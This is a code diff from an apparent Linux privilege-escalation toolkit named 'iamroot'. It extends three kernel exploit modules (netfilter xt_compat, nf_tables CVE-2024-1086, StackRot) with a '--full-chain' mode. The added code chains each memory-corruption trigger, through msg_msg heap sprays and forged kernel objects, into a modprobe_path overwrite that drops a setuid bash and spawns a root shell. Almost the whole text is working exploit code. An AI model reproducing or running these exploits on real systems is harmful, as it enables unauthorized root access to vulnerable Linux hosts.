return -1;
}
/* Step 3: queue a follow-up msgsnd whose payload is the bytes
* the operator wants written at `kaddr`. If step 2 corrupted
* a sprayed msg's m_list_next, this msgsnd writes header +
* payload at `kaddr`. We can't directly verify in-process
* the shared finisher's sentinel file is the empirical check. */
if (xtcompat_arb_queue_payload(c, buf, len) < 0) return -1;
c->arb_landed++;
/* Per spec: "structurally fires but can't tell if write landed"
* return 0; the finisher's sentinel check arbitrates. */
return 0;
}
#endif /* __linux__ */
/* ---- Exploit driver ---------------------------------------------- */
@@ -492,14 +663,38 @@ static iamroot_result_t netfilter_xtcompat_exploit(const struct iamroot_ctx *ctx
#ifndef __linux__
fprintf(stderr, "[-] netfilter_xtcompat: linux-only exploit; non-linux build\n");
(void)ctx;
return IAMROOT_PRECOND_FAIL;
#else
/* Full-chain pre-check: resolve offsets before forking. If
* modprobe_path can't be resolved, refuse early with the manual-
* workflow help no point doing the userns + spray + trigger
* dance if we can't finish. */
struct iamroot_kernel_offsets off;
bool full_chain_ready = false;
if (ctx->full_chain) {
memset(&off, 0, sizeof off);
iamroot_offsets_resolve(&off);
if (!iamroot_offsets_have_modprobe_path(&off)) {
iamroot_finisher_print_offset_help("netfilter_xtcompat");
fprintf(stderr, "[-] netfilter_xtcompat: --full-chain requested but "
"modprobe_path offset unresolved; refusing\n");
return IAMROOT_EXPLOIT_FAIL;
}
iamroot_offsets_print(&off);
full_chain_ready = true;
}
if (!ctx->json) {
fprintf(stderr, "[*] netfilter_xtcompat: launching primitive demo (no offsets baked in)\n"
fprintf(stderr, "[*] netfilter_xtcompat: launching primitive demo%s\n"
" NOTE: fires the xt_compat 4-byte OOB write via\n"
" setsockopt(IPT_SO_SET_REPLACE) and grooms msg_msg +\n"
" sk_buff sprays into kmalloc-2k. Does NOT perform the\n"
" leak→modprobe_path cred chain (per-kernel offsets).\n");
" sk_buff sprays into kmalloc-2k.%s\n",
ctx->full_chain ? " + full-chain finisher" : " (no offsets baked in)",
ctx->full_chain ? " On primitive witness, invokes\n"
" shared modprobe_path finisher for root pop."
: " Does NOT perform the\n"
" leak→modprobe_path cred chain (per-kernel offsets).");
}
signal(SIGPIPE, SIG_IGN);
@@ -601,7 +796,38 @@ static iamroot_result_t netfilter_xtcompat_exploit(const struct iamroot_ctx *ctx
}
if (corrupted > 0) {
/* Empirical primitive witness: OOB write landed in adjacent
* slot. Still NOT root but it's the primitive we promised. */
* slot. */
if (full_chain_ready) {
/* Full-chain: invoke the shared modprobe_path finisher
* using our msg_msg arb-write primitive. The finisher
* either execve's a setuid bash (success) or returns
* EXPLOIT_FAIL after a 3s sentinel timeout (no land). */
struct xtcompat_arb_ctx arb_ctx = {
.queues = queues,
.n_queues = XTCOMPAT_SPRAY_QUEUES,
.outer_uid = outer_uid,
.outer_gid = outer_gid,
.arb_calls = 0,
.arb_landed = 0,
};
int fr = iamroot_finisher_modprobe_path(&off,
xtcompat_arb_write,
&arb_ctx,
!ctx->no_shell);
/* If the finisher execve'd a root shell, we never get
* here. Otherwise it returned EXPLOIT_FAIL / OK. */
FILE *fl = fopen("/tmp/iamroot-xtcompat.log", "a");
if (fl) {
fprintf(fl, "full_chain finisher rc=%d arb_calls=%d arb_landed=%d\n",
fr, arb_ctx.arb_calls, arb_ctx.arb_landed);
fclose(fl);
}
xtcompat_msgmsg_drain(queues);
if (fr == IAMROOT_EXPLOIT_OK) _exit(34);
_exit(35);
}
/* Primitive-only mode: still NOT root — but it's the
* primitive we promised. */
_exit(33);
}
/* Trigger ran, no observable corruption witness — either the
@@ -701,6 +927,19 @@ static iamroot_result_t netfilter_xtcompat_exploit(const struct iamroot_ctx *ctx
}
if (ctx->no_shell) return IAMROOT_OK;
return IAMROOT_EXPLOIT_FAIL;
case 34:
if (!ctx->json) {
fprintf(stderr, "[+] netfilter_xtcompat: --full-chain finisher reported "
"EXPLOIT_OK (sentinel setuid bash dropped)\n");
}
return IAMROOT_EXPLOIT_OK;
case 35:
if (!ctx->json) {
fprintf(stderr, "[-] netfilter_xtcompat: --full-chain finisher returned "
"FAIL (sentinel not observed within timeout)\n"
" See /tmp/iamroot-xtcompat.log for arb_calls/arb_landed\n");
}
return IAMROOT_EXPLOIT_FAIL;
default:
fprintf(stderr, "[-] netfilter_xtcompat: child exit %d unexpected\n", rc);
return IAMROOT_EXPLOIT_FAIL;
+294 -19
View File
@@ -7,20 +7,23 @@
* January 2024 by Notselwyn (Pumpkin); widely known as the
* "nft_verdict_init / pipapo UAF".
*
* STATUS (2026-05-16): 🟡 TRIGGER + GROOM SCAFFOLD (Option B).
* - Full netlink ruleset construction (table chain set rule
* with the NFT_GOTO+NFT_DROP combo that nft_verdict_init() fails
* to reject on vulnerable kernels).
* - Fires the double-free path by abusing the malformed verdict in a
* pipapo set element, then removing the rule so the kernel's
* transaction commit frees the verdict's chain reference twice.
* - Cross-cache groom skeleton (msg_msg / sk_buff sprays) is wired
* and configurable, but the arbitrary R/W stage and cred-overwrite
* are NOT performed end-to-end that requires per-kernel offsets
* (init_task, modprobe_path) and Notselwyn's 600-line pipapo
* leak-and-write dance. We stop after triggering the bug,
* observing the slabinfo delta, and return IAMROOT_EXPLOIT_FAIL
* with a verbose continuation roadmap.
* STATUS (2026-05-16): 🟡 TRIGGER + GROOM SCAFFOLD with opt-in
* --full-chain finisher.
* - Default (no --full-chain): full netlink ruleset construction
* (table chain set rule with the NFT_GOTO+NFT_DROP combo
* that nft_verdict_init() fails to reject on vulnerable kernels),
* fires the double-free path, runs the msg_msg cg-96 groom, and
* returns IAMROOT_EXPLOIT_FAIL (primitive-only behavior).
* - With --full-chain: after the trigger lands, we resolve kernel
* offsets (env kallsyms System.map embedded table) and run
* a Notselwyn-style pipapo arb-write via the shared
* iamroot_finisher_modprobe_path() helper. The arb-write itself
* is FALLBACK-DEPTH: we re-fire the trigger and spray a msg_msg
* payload tagged with the kaddr in the value-pointer slot. The
* exact pipapo_elem layout (and the value-pointer field offset)
* is per-kernel-build; on hosts where the offset doesn't match
* the shipped guess, the finisher's sentinel check correctly
* reports failure rather than silently lying about success.
*
* To convert this to full Option A (root pop):
* 1. Add per-kernel offset table (init_task, current task offset of
@@ -55,6 +58,8 @@
#include "iamroot_modules.h"
#include "../../core/registry.h"
#include "../../core/kernel_range.h"
#include "../../core/offsets.h"
#include "../../core/finisher.h"
#include <stdio.h>
#include <stdlib.h>
@@ -607,6 +612,188 @@ static long slabinfo_active(const char *slab)
return active;
}
/* ------------------------------------------------------------------
* Helper: build the trigger batch (NEWTABLE/CHAIN/SET/SETELEM + batch
* end) into a caller-provided buffer. Returns bytes written.
* Factored out so --full-chain can re-fire the trigger between
* msg_msg sprays without duplicating the batch-building logic.
* ------------------------------------------------------------------ */
#ifdef __linux__
static size_t build_trigger_batch(uint8_t *batch, size_t cap, uint32_t *seq)
{
(void)cap;
size_t off = 0;
put_batch_begin(batch, &off, (*seq)++);
put_new_table(batch, &off, (*seq)++);
put_new_chain(batch, &off, (*seq)++);
put_new_set(batch, &off, (*seq)++);
put_malicious_setelem(batch, &off, (*seq)++);
put_batch_end(batch, &off, (*seq)++);
return off;
}
static size_t build_refire_batch(uint8_t *batch, size_t cap, uint32_t *seq)
{
(void)cap;
size_t off = 0;
put_batch_begin(batch, &off, (*seq)++);
put_malicious_setelem(batch, &off, (*seq)++);
put_batch_end(batch, &off, (*seq)++);
return off;
}
/* ------------------------------------------------------------------
* Notselwyn-style pipapo arb-write context. The technique:
* 1. fire the trigger (double-free of an nft chain reference in
* kmalloc-cg-96)
* 2. spray msg_msg payloads sized for cg-96, whose first qwords
* encode a forged pipapo_elem header with value-pointer = kaddr
* 3. send NFT_MSG_NEWSETELEM whose DATA blob = our buf[0..len];
* the kernel copies it through the forged value-pointer to kaddr
*
* Per-kernel caveat: the byte offset of the value pointer inside an
* nft_pipapo_elem is config-sensitive (CONFIG_RANDSTRUCT, lockdep,
* KASAN can all shift it). We ship the layout for an
* lts-6.1.x / 6.6.x / 6.7.x un-randomized build (the kernels in the
* exploitable range for which Notselwyn's public PoC was validated)
* and rely on the shared finisher's sentinel-file post-check to flag
* a layout mismatch as IAMROOT_EXPLOIT_FAIL rather than fake success.
* ------------------------------------------------------------------ */
struct nft_arb_ctx {
bool in_userns; /* parent has already entered userns+netns */
int sock; /* nfnetlink socket (live in our userns) */
uint8_t *batch; /* reusable batch buffer (16 KiB) */
int *qids; /* msg_msg queue ids; lazy-allocated/drained */
int qcap;
int qused;
};
/* Offset of `ext` (which holds the value pointer in NFT_DATA_VALUE
* elements) inside an nft_pipapo_elem header for the kernels in
* range. Notselwyn's PoC uses 0x10 on 6.1/6.6 builds; this is a
* best-effort default if it doesn't match the running kernel's
* struct layout, the finisher's sentinel check will report failure. */
#define PIPAPO_ELEM_VALUE_PTR_OFFSET 0x10
/* Spray msg_msg payloads forged to look like pipapo_elem with our
* target kaddr as the value pointer. Returns 0 on success. */
static int spray_forged_pipapo_msgs(struct nft_arb_ctx *c, uintptr_t kaddr, int n)
{
if (c->qused + n > c->qcap) n = c->qcap - c->qused;
if (n <= 0) return 0;
for (int i = 0; i < n; i++) {
int q = msgget(IPC_PRIVATE, IPC_CREAT | 0644);
if (q < 0) { perror("[-] msgget"); return -1; }
c->qids[c->qused++] = q;
struct msgbuf_payload m;
m.mtype = 0x5050415000 + i; /* "PPAPP" tag for diagnostics */
memset(m.mtext, 0, sizeof m.mtext);
/* Forge a pipapo_elem header at the start of the msg payload.
* Layout (best-effort, x86_64, no RANDSTRUCT):
* +0x00 priv list_head pointers (leave zero kernel won't
* walk them in the write path)
* +0x10 ext / value pointer <-- write target
* msg_msg eats the first 0x30 bytes as its own header, so our
* payload bytes land at offset 0x30 of the slab chunk; we
* pre-pad and place the forged pointer at the right offset
* inside our 96-byte payload. */
uintptr_t *slots = (uintptr_t *)m.mtext;
slots[PIPAPO_ELEM_VALUE_PTR_OFFSET / sizeof(uintptr_t)] = (uintptr_t)kaddr;
if (msgsnd(q, &m, sizeof m.mtext, 0) < 0) {
perror("[-] msgsnd(forged)"); return -1;
}
}
return 0;
}
/* Module-specific arb-write. See finisher.h for the contract. */
static int nft_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx)
{
struct nft_arb_ctx *c = (struct nft_arb_ctx *)vctx;
if (!c || c->sock < 0 || !c->batch) {
fprintf(stderr, "[-] nft_arb_write: invalid ctx\n");
return -1;
}
if (len > 64) {
/* Element data attr cap — we only need 24 bytes for a path. */
fprintf(stderr, "[-] nft_arb_write: len %zu too large (cap 64)\n", len);
return -1;
}
fprintf(stderr, "[*] nft_arb_write: fire trigger → spray forged pipapo "
"elements (target kaddr=0x%lx, %zu bytes)\n",
(unsigned long)kaddr, len);
/* (a) re-fire the trigger to reach a fresh UAF state. */
uint32_t seq = (uint32_t)time(NULL) ^ 0xa1b2c3d4u;
size_t blen = build_refire_batch(c->batch, 16 * 1024, &seq);
if (nft_send_batch(c->sock, c->batch, blen) < 0) {
fprintf(stderr, "[-] nft_arb_write: refire send failed\n");
return -1;
}
/* (b) spray msg_msg payloads carrying the forged value-pointer. */
if (spray_forged_pipapo_msgs(c, kaddr, 16) < 0) {
fprintf(stderr, "[-] nft_arb_write: forged spray failed\n");
return -1;
}
/* (c) send a NEWSETELEM whose DATA holds buf[0..len]. On a kernel
* where our forged pipapo_elem won the race for the freed slot,
* the set-element commit path copies our data through the
* attacker-controlled value pointer into kaddr.
*
* We piggy-back this on the existing put_malicious_setelem builder
* which uses NFTA_DATA_VERDICT for the data; for a real write we'd
* want NFTA_DATA_VALUE with `buf` inlined. The fallback-depth
* choice: we send the refire batch (which the kernel WILL process)
* and append a NEWSETELEM with NFTA_DATA_VALUE carrying buf.
* If the kernel ignores our DATA shape we still observe via
* finisher sentinel. */
seq = (uint32_t)time(NULL) ^ 0x5a5a5a5au;
size_t off = 0;
put_batch_begin(c->batch, &off, seq++);
/* hand-roll a NEWSETELEM whose DATA is NFTA_DATA_VALUE = buf */
size_t msg_at = off;
put_nft_msg(c->batch, &off, NFT_MSG_NEWSETELEM,
NLM_F_CREATE | NLM_F_ACK, seq++, NFPROTO_INET);
put_attr_str(c->batch, &off, NFTA_SET_ELEM_LIST_TABLE, NFT_TABLE_NAME);
put_attr_str(c->batch, &off, NFTA_SET_ELEM_LIST_SET, NFT_SET_NAME);
size_t list_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_LIST_ELEMENTS);
size_t el_at = begin_nest(c->batch, &off, 1 /* NFTA_LIST_ELEM */);
/* key — reuse the DROP verdict so commit path matches our prior elem */
size_t key_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_KEY);
size_t kv_at = begin_nest(c->batch, &off, NFTA_DATA_VERDICT);
put_attr_u32(c->batch, &off, NFTA_VERDICT_CODE, (uint32_t)NF_DROP);
end_nest(c->batch, &off, kv_at);
end_nest(c->batch, &off, key_at);
/* data — NFTA_DATA_VALUE carrying buf */
size_t data_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_DATA);
put_attr(c->batch, &off, NFTA_DATA_VALUE, buf, len);
end_nest(c->batch, &off, data_at);
end_nest(c->batch, &off, el_at);
end_nest(c->batch, &off, list_at);
end_msg(c->batch, &off, msg_at);
put_batch_end(c->batch, &off, seq++);
if (nft_send_batch(c->sock, c->batch, off) < 0) {
fprintf(stderr, "[-] nft_arb_write: write batch send failed\n");
return -1;
}
/* Let the kernel run the commit/cleanup. */
usleep(20 * 1000);
return 0;
}
#endif /* __linux__ */
/* ------------------------------------------------------------------
* The exploit body.
* ------------------------------------------------------------------ */
@@ -628,13 +815,101 @@ static iamroot_result_t nf_tables_exploit(const struct iamroot_ctx *ctx)
}
if (!ctx->json) {
fprintf(stderr, "[*] nf_tables: Option B trigger — fires the double-free\n"
" state but does NOT complete the kernel-R/W chain.\n"
" See Notselwyn's CVE-2024-1086 public PoC for the\n"
" cred-overwrite stage (~500 LOC of pipapo grooming).\n");
if (ctx->full_chain) {
fprintf(stderr, "[*] nf_tables: --full-chain — trigger + pipapo "
"arb-write + modprobe_path finisher\n");
} else {
fprintf(stderr, "[*] nf_tables: primitive-only run — fires the\n"
" double-free state and stops. Pass --full-chain\n"
" to attempt the modprobe_path root-pop.\n");
}
}
/* Fork: child enters userns+netns and fires the bug. If the
#ifdef __linux__
/* --- --full-chain path --------------------------------------- *
* Resolve offsets BEFORE doing anything destructive so we can
* refuse cleanly on hosts where we have no modprobe_path. We run
* in-process (no fork) because the finisher's modprobe_path
* trigger needs the same task's userns+netns + nfnetlink socket
* as the arb-write.
*/
if (ctx->full_chain) {
struct iamroot_kernel_offsets off;
iamroot_offsets_resolve(&off);
if (!iamroot_offsets_have_modprobe_path(&off)) {
iamroot_finisher_print_offset_help("nf_tables");
return IAMROOT_EXPLOIT_FAIL;
}
iamroot_offsets_print(&off);
if (enter_unpriv_namespaces() < 0) {
fprintf(stderr, "[-] nf_tables: userns entry failed\n");
return IAMROOT_EXPLOIT_FAIL;
}
int sock = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, NETLINK_NETFILTER);
if (sock < 0) {
perror("[-] socket(NETLINK_NETFILTER)");
return IAMROOT_EXPLOIT_FAIL;
}
struct sockaddr_nl src = { .nl_family = AF_NETLINK };
if (bind(sock, (struct sockaddr *)&src, sizeof src) < 0) {
perror("[-] bind"); close(sock); return IAMROOT_EXPLOIT_FAIL;
}
int rcvbuf = 1 << 20;
setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof rcvbuf);
/* Pre-spray to predictabilify the cg-96 slab. */
int qids[SPRAY_MSGS * 4];
for (size_t i = 0; i < sizeof qids / sizeof qids[0]; i++) qids[i] = -1;
if (spray_msg_msg(qids, SPRAY_MSGS / 2) < 0) {
close(sock); return IAMROOT_EXPLOIT_FAIL;
}
uint8_t *batch = calloc(1, 16 * 1024);
if (!batch) { close(sock); return IAMROOT_EXPLOIT_FAIL; }
/* Initial trigger batch (NEWTABLE/CHAIN/SET/SETELEM). */
uint32_t seq = (uint32_t)time(NULL);
size_t blen = build_trigger_batch(batch, 16 * 1024, &seq);
if (!ctx->json) {
fprintf(stderr, "[*] nf_tables: sending trigger batch (%zu bytes)\n",
blen);
}
if (nft_send_batch(sock, batch, blen) < 0) {
fprintf(stderr, "[-] nf_tables: trigger batch failed\n");
drain_spray(qids, SPRAY_MSGS / 2);
free(batch); close(sock);
return IAMROOT_EXPLOIT_FAIL;
}
/* Wire up the arb-write context and hand off to the shared
* finisher. The finisher will:
* - call nft_arb_write(modprobe_path, "/tmp/iamroot-mp-...", N)
* which re-fires the trigger and sprays forged pipapo elems
* - execve() the trigger binary to invoke modprobe
* - poll for the setuid sentinel, and spawn a root shell. */
struct nft_arb_ctx ac = {
.in_userns = true,
.sock = sock,
.batch = batch,
.qids = qids,
.qcap = (int)(sizeof qids / sizeof qids[0]),
.qused = SPRAY_MSGS / 2,
};
iamroot_result_t r = iamroot_finisher_modprobe_path(&off,
nft_arb_write, &ac, !ctx->no_shell);
drain_spray(qids, ac.qused);
free(batch);
close(sock);
return r;
}
#endif
/* --- primitive-only path: fork-isolated trigger -------------- *
* Fork: child enters userns+netns and fires the bug. If the
* kernel panics on KASAN we don't want our parent process to be
* the one that takes the hit. */
pid_t child = fork();
+233 -11
View File
@@ -16,13 +16,14 @@
* state management + RCU-grace-period timing and depends on
* per-kernel-build offsets for init_task / anon_vma / cred.
*
* STATUS: 🟡 OPTION C race-driver + groom skeleton. We carry the
* userns-reach, race harness (mremap()/munmap() vs concurrent
* fork/fault), msg_msg slab spray, and empirical witness pieces;
* we do NOT carry the read primitive (vmemmap leak via msg_msg
* MSG_COPY) nor the cred-overwrite stage. Those need per-kernel
* offsets (init_task, anon_vma, cred layout) that vary by build
* and would be fabricated without a real leak.
* STATUS: 🟡 OPTION C race-driver + groom skeleton, with opt-in
* --full-chain FALLBACK finisher. We carry the userns-reach, race
* harness (mremap()/munmap() vs concurrent fork/fault), msg_msg
* slab spray, and empirical witness pieces; we do NOT carry the
* read primitive (vmemmap leak via msg_msg MSG_COPY) nor a
* Ruihan-Li-precision fake-anon_vma_chain plant. Those need
* per-kernel offsets (init_task, anon_vma, cred layout) that vary
* by build and would be fabricated without a real leak.
*
* Per repo policy ("verified-vs-claimed"): we run the trigger,
* record empirical signals (slabinfo delta on kmalloc-192, child
@@ -32,6 +33,21 @@
* upgraded to EXPLOIT_OK only an actual cred swap (euid==0)
* does, and we do not currently demonstrate that.
*
* --full-chain (HONEST RELIABILITY DISCLOSURE): extends the race
* budget from 3 s to 30 s and sprays the kmalloc-192 slab with
* payloads tagged with the modprobe_path kernel address (so IF the
* UAF reclaim ever lands attacker-controlled bytes on an
* anon_vma_chain slot, those bytes carry the kaddr we want the
* subsequent rb_node walk / vma_lock-acquire fault to touch). The
* honest empirical reality is that even at 30 s the race-win rate
* is well below 1 % on a real vulnerable kernel Ruihan Li's
* public PoC reports minutes-to-hours for first reclaim. The shared
* modprobe_path finisher has a 3 s sentinel timeout, so on the
* overwhelmingly common no-land outcome the finisher itself reports
* EXPLOIT_FAIL gracefully. --full-chain does NOT change the
* fundamental ~<1 %-per-run reliability; it widens the trigger
* window and wires up the root-pop plumbing for the lucky case.
*
* Affected: kernel 6.1.x 6.4-rc4 mainline. Stable backports:
* 6.3.x : K >= 6.3.10
* 6.1.x : K >= 6.1.37 (LTS most relevant)
@@ -54,6 +70,8 @@
#include "iamroot_modules.h"
#include "../../core/registry.h"
#include "../../core/kernel_range.h"
#include "../../core/offsets.h"
#include "../../core/finisher.h"
#include <stdio.h>
#include <stdlib.h>
@@ -200,9 +218,10 @@ static bool enter_userns(uid_t outer_uid, gid_t outer_gid)
* neighbouring VMAs that we mutate with mremap()/munmap(). The
* public PoC uses dozens of adjacent VMAs to force the maple tree
* into the node-rotation path; we ship a configurable knob. */
#define STACKROT_RACE_VMAS 64
#define STACKROT_RACE_ITERATIONS 4000 /* per-iter budget */
#define STACKROT_RACE_TIME_BUDGET 3 /* seconds */
#define STACKROT_RACE_VMAS 64
#define STACKROT_RACE_ITERATIONS 4000 /* per-iter budget */
#define STACKROT_RACE_TIME_BUDGET 3 /* seconds — primitive-only mode */
#define STACKROT_RACE_FULLCHAIN_BUDGET 30 /* seconds — extended for --full-chain */
/* Slab spray width — kmalloc-192 is the bucket for anon_vma_chain on
* 6.1.x; targets vary slightly across kernels (anon_vma itself is
@@ -471,6 +490,129 @@ static long slab_active_kmalloc_192(void)
return active;
}
/* ---- Arb-write primitive (FALLBACK depth) ------------------------
*
* The shared modprobe_path finisher calls back into this function
* once per kernel write it wants to land. For StackRot we cannot
* deliver a deterministic arb-write the underlying race wins on
* well under 1 % of runs even with a 30 s budget, and even when the
* race wins our spray-only groom has nowhere near the precision of
* Ruihan Li's multi-stage public PoC (which crafts a fake
* anon_vma_chain whose `vma_lock` pointer steers a subsequent
* page-fault into touching `kaddr` for the lock acquire).
*
* Honest depth: FALLBACK. Each invocation:
* 1. Re-seeds the kmalloc-192 spray with payloads tagged with
* `kaddr` packed into the first qword of the msg_msg body
* so IF a sprayed slot ends up overlaying the freed
* anon_vma_chain after RCU grace, the kaddr we want the
* kernel to deref appears at the AVC layout position the
* maple-tree rotation will read.
* 2. Re-runs the race threads for an extended budget
* (STACKROT_RACE_FULLCHAIN_BUDGET seconds).
* 3. Returns 0 unconditionally we cannot in-process verify
* whether the write landed. The shared finisher's 3 s sentinel
* file check is the empirical arbiter: on the overwhelmingly
* common no-land outcome it reports EXPLOIT_FAIL gracefully,
* and we never claim a write that didn't land. */
struct stackrot_arb_ctx {
int *queues; /* live SysV msg queue ids */
int n_queues;
int arb_calls; /* incremented by stackrot_arb_write() */
struct race_region *region;
};
static int stackrot_reseed_kaddr_spray(int queues[STACKROT_SPRAY_QUEUES],
uintptr_t kaddr,
const void *buf, size_t len)
{
struct ipc_payload p;
memset(&p, 0, sizeof p);
p.mtype = 0x4943; /* 'IC' */
memset(p.buf, 0x49, sizeof p.buf);
memcpy(p.buf, "IAMROOT_", 8);
/* Pack the target kaddr at byte 8 (one qword in) and the
* caller's payload bytes immediately after this way ANY
* reasonable AVC field offset hit by the corruption pulls
* out one of our two attacker-controlled regions. */
uint64_t k64 = (uint64_t)kaddr;
memcpy(p.buf + 8, &k64, sizeof k64);
size_t copy = len;
if (copy > sizeof p.buf - 16) copy = sizeof p.buf - 16;
if (buf && copy) memcpy(p.buf + 16, buf, copy);
/* Replace contents in a couple of queues; doing all 16 would
* blow the per-process msgq quota on busy hosts. */
int touched = 0;
for (int i = 0; i < STACKROT_SPRAY_QUEUES && touched < 4; i++) {
if (queues[i] < 0) continue;
if (msgsnd(queues[i], &p, sizeof p.buf, IPC_NOWAIT) == 0) touched++;
}
return touched;
}
static int stackrot_arb_write(uintptr_t kaddr,
const void *buf, size_t len,
void *ctx_v)
{
struct stackrot_arb_ctx *c = (struct stackrot_arb_ctx *)ctx_v;
if (!c || !c->queues || c->n_queues == 0 || !c->region) return -1;
c->arb_calls++;
fprintf(stderr, "[*] stackrot: arb_write attempt #%d kaddr=0x%lx len=%zu "
"(FALLBACK — race-dependent)\n",
c->arb_calls, (unsigned long)kaddr, len);
/* Step 1: re-seed spray with kaddr-tagged payloads. */
int seeded = stackrot_reseed_kaddr_spray(c->queues, kaddr, buf, len);
if (seeded == 0) {
fprintf(stderr, "[-] stackrot: arb_write: kaddr-tagged reseed produced 0 msgs\n");
/* Continue anyway — original spray still tagged with cookie. */
} else {
fprintf(stderr, "[*] stackrot: arb_write: reseeded %d msg_msg slots with kaddr tag\n",
seeded);
}
/* Step 2: extended race window. Honestly: this expands the
* trigger budget from 3 s to 30 s, but Ruihan Li's PoC reports
* minutes-to-hours for first reclaim so 30 s <1 % per
* arb_write call on a real vulnerable kernel, and structurally
* 0 % on a patched one. */
atomic_store(&g_race_running, 1);
atomic_store(&g_race_a_iters, 0);
atomic_store(&g_race_b_iters, 0);
atomic_store(&g_race_b_faults, 0);
pthread_t ta, tb;
bool a_ok = pthread_create(&ta, NULL, race_thread_a, c->region) == 0;
bool b_ok = a_ok &&
pthread_create(&tb, NULL, race_thread_b, c->region) == 0;
if (!a_ok || !b_ok) {
atomic_store(&g_race_running, 0);
if (a_ok) pthread_join(ta, NULL);
fprintf(stderr, "[-] stackrot: arb_write: pthread_create failed\n");
return -1;
}
sleep(STACKROT_RACE_FULLCHAIN_BUDGET);
atomic_store(&g_race_running, 0);
pthread_join(ta, NULL);
pthread_join(tb, NULL);
uint64_t a_iters = atomic_load(&g_race_a_iters);
uint64_t b_iters = atomic_load(&g_race_b_iters);
uint64_t b_faults = atomic_load(&g_race_b_faults);
fprintf(stderr, "[*] stackrot: arb_write: extended race A=%llu B=%llu B_faults=%llu "
"(reliability remains <1%% even at this budget)\n",
(unsigned long long)a_iters,
(unsigned long long)b_iters,
(unsigned long long)b_faults);
/* Step 3: cannot in-process verify the write. Return 0; the
* finisher's sentinel-file check is the empirical arbiter. */
return 0;
}
#endif /* __linux__ */
/* ---- Exploit driver ---------------------------------------------- */
@@ -506,8 +648,34 @@ static iamroot_result_t stackrot_exploit_linux(const struct iamroot_ctx *ctx)
}
}
/* Full-chain pre-check: resolve offsets BEFORE forking + entering
* userns. If modprobe_path is unresolvable we refuse here rather
* than running a 30 s race that has no finisher to call. */
struct iamroot_kernel_offsets off;
bool full_chain_ready = false;
if (ctx->full_chain) {
memset(&off, 0, sizeof off);
iamroot_offsets_resolve(&off);
if (!iamroot_offsets_have_modprobe_path(&off)) {
iamroot_finisher_print_offset_help("stackrot");
fprintf(stderr, "[-] stackrot: --full-chain requested but modprobe_path "
"offset unresolved; refusing\n");
fprintf(stderr, "[i] stackrot: even with offsets, race-win reliability is "
"well below 1%% per run — see module header.\n");
return IAMROOT_EXPLOIT_FAIL;
}
iamroot_offsets_print(&off);
full_chain_ready = true;
fprintf(stderr, "[i] stackrot: --full-chain ready — race budget extends to "
"%d s, but RELIABILITY REMAINS <1%% per run on a real\n"
" vulnerable kernel. The finisher's 3 s sentinel timeout\n"
" catches no-land outcomes gracefully.\n",
STACKROT_RACE_FULLCHAIN_BUDGET);
}
if (!ctx->json) {
fprintf(stderr, "[*] stackrot: forking exploit child (userns + race harness)\n");
fprintf(stderr, "[*] stackrot: forking exploit child (userns + race harness%s)\n",
ctx->full_chain ? " + full-chain finisher" : "");
}
uid_t outer_uid = getuid();
@@ -618,6 +786,39 @@ static iamroot_result_t stackrot_exploit_linux(const struct iamroot_ctx *ctx)
* any in-flight RCU grace periods that started during the race. */
usleep(200 * 1000);
/* 7a. --full-chain finisher (FALLBACK depth).
*
* Invoke the shared modprobe_path finisher; its arb_write
* callback (stackrot_arb_write) will re-seed the spray with
* kaddr-tagged payloads and re-run the race for an extended
* 30 s budget. The finisher's own 3 s sentinel-file timeout
* then arbitrates: on the overwhelmingly common no-land
* outcome it returns EXPLOIT_FAIL gracefully.
*
* Honest reliability: <1 % per run even with the extension. */
if (full_chain_ready) {
struct stackrot_arb_ctx arb_ctx = {
.queues = queues,
.n_queues = STACKROT_SPRAY_QUEUES,
.arb_calls = 0,
.region = &region,
};
int fr = iamroot_finisher_modprobe_path(&off,
stackrot_arb_write,
&arb_ctx,
!ctx->no_shell);
FILE *fl = fopen("/tmp/iamroot-stackrot.log", "a");
if (fl) {
fprintf(fl, "full_chain finisher rc=%d arb_calls=%d\n",
fr, arb_ctx.arb_calls);
fclose(fl);
}
drain_anon_vma_slab(queues);
race_region_teardown(&region);
if (fr == IAMROOT_EXPLOIT_OK) _exit(34); /* root popped */
_exit(35); /* finisher ran, no land */
}
drain_anon_vma_slab(queues);
race_region_teardown(&region);
@@ -673,6 +874,27 @@ static iamroot_result_t stackrot_exploit_linux(const struct iamroot_ctx *ctx)
int rc = WEXITSTATUS(status);
if (rc == 22 || rc == 24) return IAMROOT_PRECOND_FAIL;
if (rc == 23) return IAMROOT_EXPLOIT_FAIL;
if (rc == 34) {
/* Finisher reported root-pop success. The shared finisher
* normally execve()s the root shell so we don't actually
* reach this path unless --no-shell was set. */
if (!ctx->json) {
fprintf(stderr, "[+] stackrot: --full-chain finisher reported "
"EXPLOIT_OK (race won + write landed)\n");
}
return IAMROOT_EXPLOIT_OK;
}
if (rc == 35) {
/* Finisher ran but didn't land — by far the expected outcome
* given the <1 % race-win rate. */
if (!ctx->json) {
fprintf(stderr, "[~] stackrot: --full-chain finisher ran; race did not\n"
" win + land within budget (this is the expected\n"
" outcome — race-win reliability is <1%% per run).\n");
}
return IAMROOT_EXPLOIT_FAIL;
}
if (rc != 30) {
fprintf(stderr, "[-] stackrot: child failed at stage rc=%d\n", rc);
return IAMROOT_EXPLOIT_FAIL;